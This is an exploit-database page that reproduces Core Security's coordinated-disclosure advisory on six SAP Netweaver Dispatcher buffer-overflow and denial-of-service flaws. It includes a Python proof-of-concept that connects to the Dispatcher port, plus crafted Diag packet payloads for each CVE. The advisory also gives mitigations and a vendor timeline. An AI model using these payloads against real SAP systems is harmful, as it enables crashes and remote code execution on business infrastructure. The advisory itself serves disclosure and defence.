[ home ]  [ private ]  [ 0Day ]  [ discount ]  [ Get Gold ]  [ platforms ]  [ pentest ]  [ search ]  [ faq ]  [ contact ]  [ style ]  [ Prices in Gold ]   db: 39 583    
0day Today Exploit DB Official Facebook
0day Today Exploit DB Official Twitter
0day Today Exploit DB Official RSS Channel
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - Biggest Exploit Database in the World.
Select your language:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
Things you should know about 0day.today:
  • We use one main domain: http://0day.today
  • Most of the materials is completely FREE
  • If you want to purchase the exploit / get V.I.P. access or pay for any other service,
    you need to buy or earn GOLD
We accept currencies: [contact admin to find more]
           
We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
I am registered user of 0day.today. I don't want to see this screen in future.
What to do first?
  1. Read the [ agreement ]
  2. Read the [ Submit ] rules
  3. Visit the [ faq ] page
  4. [ Register ] profile
  5. Get [ GOLD ]
  6. If you want to [ sell ]
  7. If you want to [ buy ]
  8. If you lost [ Account ]
  9. Any questions [ admin@0day.today ]


Main links


You can contact us by

Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day Today Exploits Market and 0day Exploits Database

SAP Netweaver Dispatcher Multiple Vulnerabilities

Author
Core Security
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-18227
Category
dos / poc
Date add
09-05-2012
Platform
windows
SAP Netweaver Dispatcher Multiple Vulnerabilities
 
 
1. *Advisory Information*
 
Title: SAP Netweaver Dispatcher Multiple Vulnerabilities
Advisory ID: CORE-2012-0123
Advisory URL:
http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities
Date published: 2012-05-08
Date of last update: 2012-05-08
Vendors contacted: SAP
Release mode: Coordinated release
 
 
2. *Vulnerability Information*
 
Class: Buffer overflow [CWE-119]
Impact: Code execution, Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512,
CVE-2012-2513, CVE-2012-2514
 
 
3. *Vulnerability Description*
 
SAP Netweaver [1] is a technology platform for building and integrating
SAP business applications. Multiple vulnerabilities have been found in
SAP Netweaver that could allow an unauthenticated, remote attacker to
execute arbitrary code and lead to denial of service conditions. The
vulnerabilities are triggered sending specially crafted SAP Diag packets
to remote TCP port 32NN (being NN the SAP system number) of a host
running the "Dispatcher" service, part of SAP Netweaver Application
Server ABAP. By sending different messages, the different
vulnerabilities can be triggered.
 
 
4. *Vulnerable packages*
 
   . SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313).
   . SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869).
   . Older versions are probably affected too, but they were not checked.
 
 
5. *Non-vulnerable packages*
 
   . Vendor did not provide this information.
 
 
6. *Vendor Information, Solutions and Workarounds*
 
SAP released the security note
https://service.sap.com/sap/support/notes/1687910 regarding these
issues. Contact SAP for further information.
 
Martin Gallo proposed the following actions to mitigate the impact of
the vulnerabilities:
 
   1. Disable work processes' Developer Traces for the 'Dialog
Processing' component (for the vulnerabilities [CVE-2011-1516],
[CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).
   2. Restrict access to the Dispatcher service's TCP ports (3200/3299)
(for all vulnerabilities).
   3. Restrict access to the work process management transactions
SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the
vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and
[CVE-2012-2512]).
 
 
7. *Credits*
 
These vulnerabilities were discovered and researched by Martin Gallo
from
http://www.coresecurity.com/content/services-overview-core-security-consulting-services.
The publication of this advisory was coordinated by Fernando Miranda
from http://www.coresecurity.com/content/corelabs-advisories .
 
 
8. *Technical Description / Proof of Concept Code*
 
*NOTE:* (The tracing of 'Dialog processing' has to be in level 2 or 3 in
order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511]
and [CVE-2012-2512]).
 
The following python script can be used to reproduce the vulnerabilities
described below:
 
/-----
import socket, struct
from optparse import OptionParser
 
# Parse the target options
parser = OptionParser()
parser.add_option("-l", "--hostname", dest="hostname", help="Hostname",
default="localhost")
parser.add_option("-p", "--port", dest="port", type="int", help="Port
number", default=3200)
(options, args) = parser.parse_args()
 
def send_packet(sock, packet):
    packet = struct.pack("!I", len(packet)) + packet
    sock.send(packet)
 
def receive(sock):
    length = sock.recv(4)
    (length, ) = struct.unpack("!I", length)
    data = ""
    while len(data)<length:
        data+= sock.recv(length)
    return (length, data)
 
def initialize(sock):
    diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00"
    user_connect =
"\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8"
    support_data = "\x10\x04\x0b\x00\x20"
    support_data+=
"\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93"
    support_data+=
"\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00"
    dpheader =
"\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
    dpheader+= struct.pack("I", len(diagheader + user_connect +
support_data))
    dpheader+=
"\x00\xff\xff\xff\xff\xff\xff                                        "
    dpheader+= "terminalXXXXXXX"
    dpheader+=
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00                  
\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    send_packet(sock, dpheader + diagheader + user_connect + support_data)
 
def send_message(sock, message):
    diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00"
    step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01"
    eom = "\x0c"
    send_packet(sock, diagheader + step + message + eom)
 
# Connect and send initialization packet
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((options.hostname, options.port))
initialize(connection)
receive(connection)     
 
-----/
 In the following subsections, we give the python code that can be added
after the script above in order to reproduce all vulnerabilities.
 
 
8.1. *SAP Netweaver DiagTraceR3Info Vulnerability*
 
[CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver
'disp+work.exe' module process a specially crafted network packet.
Malicious packets are processed by the vulnerable function
'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace
is configured at levels 2 or 3 for the "Dialog processor" component of
the "Dialog" work process handling the packet [2]. This vulnerability
could allow a remote unauthenticated attacker to execute arbitrary code
with the privileges of the user running the "Dispatcher" service. The
following python code can be used to trigger the vulnerability:
 
/-----
crash = "X"*114 + "\xff\xff" # --> Unicode Address to call !
crash+= "Y"*32
crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash
send_message(connection, crash)
-----/
 
 
 
8.2. *SAP Netweaver DiagTraceHex Denial of Service Vulnerability*
 
[CVE-2011-1517] The vulnerability can be triggered by sending a
specially crafted network packet to the vulnerable function
'DiagTraceHex' in the 'disp+work.exe'. This vulnerability could allow a
remote unauthenticated attacker to conduct a denial of service attack
against the vulnerable systems. The following python code can be used to
trigger the vulnerability:
 
/-----
crash = "\x12\x04\x18\xff\xff\xff\xffCrash!"
send_message(connection, crash)
-----/
 
 
 
8.3. *SAP Netweaver DiagTraceAtoms Denial of Service Vulnerability*
 
[CVE-2012-2511] The vulnerability can be triggered by sending a
specially crafted network packet to the vulnerable function
'DiagTraceAtoms'. This vulnerability could allow a remote
unauthenticated attacker to conduct a denial of service attack. The
following python code can be used to trigger the vulnerability:
 
/-----
crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8
send_message(connection, crash)
-----/
 
 
 
8.4. *SAP Netweaver DiagTraceStreamI Denial of Service Vulnerability*
 
[CVE-2012-2512] The vulnerability can be triggered by sending a
specially crafted network packet to the vulnerable function
'DiagTraceStreamI' and could allow a remote unauthenticated attacker to
conduct a denial of service attack.
 
/-----
crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51"
send_message(connection, crash)
-----/
 
 
 
8.5. *SAP Netweaver Diaginput Denial of Service Vulnerability*
 
[CVE-2012-2513] The vulnerability can be triggered by the vulnerable
function 'Diaginput', allowing a denial of service attack against the
vulnerable systems.
 
/-----
crash = "\x10\x0c\x0e\x00\0a" + "A"*10
send_message(connection, crash)
-----/
 
 
 
8.6. *SAP Netweaver DiagiEventSource Denial of Service Vulnerability*
 
[CVE-2012-2514] The vulnerability can be triggered by the vulnerable
function 'DiagiEventSource' in the 'disp+work.exe' module. This
vulnerability could allow a remote unauthenticated attacker to conduct a
denial of service attack.
 
/-----
crash = "\x10\x0f\x01\x00\x11" + "A"*17
send_message(connection, crash)
-----/
 
 
 
9. *Report Timeline*
 
. 2012-01-24:
Core Security Technologies notifies the SAP team of the vulnerability,
setting the estimated publication date of the advisory for February
21st, 2012.
 
. 2012-01-24:
Core sends an advisory draft with technical details.
 
. 2012-01-24:
The SAP team confirms the reception of the issue and asks to use the
security ID 582820-2012 for further communication. SAP also notifies its
terms and conditions [3], and asks for Core to commit to that guideline.
 
. 2012-02-01:
The Core Advisories Team communicates that it has its own guidelines for
the advisories publication process, which may conflict with SAP's
guidelines. In particular, Core does not guarantee that the publication
of the advisory will be postponed until a fix or patch is made available
by SAP. If information about this vulnerability is partially or
completely leaked by a third party, the advisory would be released
immediately as forced release. Despite this, the Core team commits to
comply with SAP's guidelines as much as possible.
 
. 2012-02-21:
First release date missed.
 
. 2012-02-22:
Core asks for the status of the fix and notifies that the release date
was missed.
 
. 2012-02-23:
SAP notifies that, because the development team has to downport the
solutions for a huge bunch of software releases, the earliest release
date for the patches would be May 8th 2012.
 
. 2012-02-23:
Core re-schedules the advisory publication to May 8th.
 
. 2012-04-16:
Core asks if the patching process is still on track to release patches
on May 8th and requests a status of the fix.
 
. 2012-04-16:
Vendor notifies that the release date is still planned for May 8th, but
due to quality control processes this date cannot be guaranteed.
 
. 2012-05-04:
Core notifies that everything is ready for publication and requests the
vendor to confirm the release date and the list of affected platforms
(no reply received).
 
. 2012-05-07:
Core asks again for the status of the fix.
 
. 2012-05-08:
SAP notifies that they have released the security note 1687910 [4] on
May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP
also requests Core to remove all the technical information researched by
Martin Gallo in [Sec. 8].
 
. 2012-05-08:
Core replies that the reporting of vulnerabilities is aimed at helping
vulnerable users to understand and address the issues; the advisory will
thus be released with the technical information.
 
. 2012-05-08:
Advisory CORE-2012-0123 published.
 
 
 
10. *References*
 
[1] http://www.sap.com/platform/netweaver/index.epx
[2]
http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm
[3] SAP's legal information, terms and conditions
http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46.
 
[4] SAP security note 1687910
https://service.sap.com/sap/support/notes/1687910.



#  0day.today [2024-11-15]  #
0day Today Exploit Database buy and sell exploits type (local, remote, DoS, PoC, etc.)
Send all submissions to mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team